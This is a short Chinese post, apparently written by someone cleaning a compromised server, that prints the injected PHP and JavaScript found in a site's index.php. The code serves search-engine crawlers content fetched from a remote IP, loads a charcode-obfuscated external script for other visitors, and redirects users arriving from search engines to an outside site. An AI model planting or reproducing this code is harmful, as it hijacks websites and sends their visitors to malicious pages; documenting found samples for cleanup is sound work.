帮别人处理服务器时发现的

首先把拿到的网站首页查看源代码替换原来的index.php

然后在头部加以下代码

<?php

$key= $_SERVER["HTTP_USER_AGENT"];echo $key;
if(strpos($key,'ogou')!== false || strpos($key,'aidu')!==false || strpos($key,'360')!==false || strpos($key,'so')!==false)
{
  header("Content-Type: text/html;charset=gb2312");
   $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
   $file = file_get_contents('http://103.76.85.101:2218/'."/index.php?host=".$host_name."&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']); 
   echo $file;
   exit();
}else{
  echo '<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,54,56,54,48,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script>';
}
?>

//不是搜索引擎时加载的一段JS也就是上面ELSE加载的那段
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?5389c7fc17035dfab2ade749b0b79e96";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
(function () {
    /*百度推送代码*/
     var bp = document.createElement('script');
     bp.src = '//push.zhanzhang.baidu.com/push.js';
     var s = document.getElementsByTagName("script")[0];
     s.parentNode.insertBefore(bp, s);
     /*360推送代码*/
     var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
     document.write('<script src="' + src + '" id="sozz"><\/script>');
     })();

//以上统计代码 以下跳目标站点

document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://3372033.com/6860/\";");
document.writeln("</script>");